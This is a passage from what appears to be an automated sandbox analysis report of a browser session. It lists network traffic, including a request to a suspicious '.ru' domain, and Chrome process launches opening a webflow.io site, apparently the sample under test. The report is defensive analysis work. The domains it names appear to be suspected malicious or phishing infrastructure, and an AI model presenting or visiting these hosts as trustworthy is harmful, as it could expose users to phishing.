                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4dUCVbwwfJAMDCTdG7tXfY4m1jjMXSrAgiC5TjMmE%2FSnFhYAr7pLMU9u7RYsmgs9UCfShp2di2utQmlZ3YgkOth4e3yn9QzX7oQawiRxnhIdWFGB8pPG34dwfbJaAj8SR80%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 9277365b49571a28-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=89492&min_rtt=89397&rtt_var=18933&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2815&recv_bytes=1140&delivery_rate=34176&cwnd=252&unsent_bytes=0&cid=9e3664e6c2a30e97&ts=779&x=0"
                                                    2025-03-28 12:43:18 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                    Data Ascii: 11
                                                    2025-03-28 12:43:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    18192.168.2.549762104.21.96.14436888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-28 12:43:18 UTC393OUTGET /kabutar@sp5p7o HTTP/1.1
                                                    Host: zh1od.idmquc.ru
                                                    Connection: keep-alive
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                    Accept: */*
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: empty
                                                    Sec-Fetch-Storage-Access: active
                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                    Accept-Language: en-US,en;q=0.9
                                                    2025-03-28 12:43:19 UTC281INHTTP/1.1 200 OK
                                                    Date: Fri, 28 Mar 2025 12:43:19 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Server: cloudflare
                                                    Access-Control-Allow-Origin: *
                                                    Cf-Cache-Status: DYNAMIC
                                                    CF-RAY: 92773662fe7a6e2f-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2025-03-28 12:43:19 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                    Data Ascii: 11
                                                    2025-03-28 12:43:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    020406080s020406080100

                                                    Click to jump to process

                                                    020406080s0.0050100MB

                                                    Click to jump to process

                                                    Target ID:5
                                                    Start time:08:42:28
                                                    Start date:28/03/2025
                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                    Imagebase:0x7ff6e76a0000
                                                    File size:3'388'000 bytes
                                                    MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:false

                                                    Target ID:6
                                                    Start time:08:42:33
                                                    Start date:28/03/2025
                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2340,i,14008239827598633559,7203292327905871157,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2372 /prefetch:3
                                                    Imagebase:0x7ff6e76a0000
                                                    File size:3'388'000 bytes
                                                    MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:false

                                                    Target ID:7
                                                    Start time:08:42:35
                                                    Start date:28/03/2025
                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2340,i,14008239827598633559,7203292327905871157,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=4940 /prefetch:8
                                                    Imagebase:0x7ff6e76a0000
                                                    File size:3'388'000 bytes
                                                    MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:false

                                                    Target ID:10
                                                    Start time:08:42:39
                                                    Start date:28/03/2025
                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://littlestownseniorhighschool.webflow.io/"
                                                    Imagebase:0x7ff6e76a0000
                                                    File size:3'388'000 bytes
                                                    MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                    No disassembly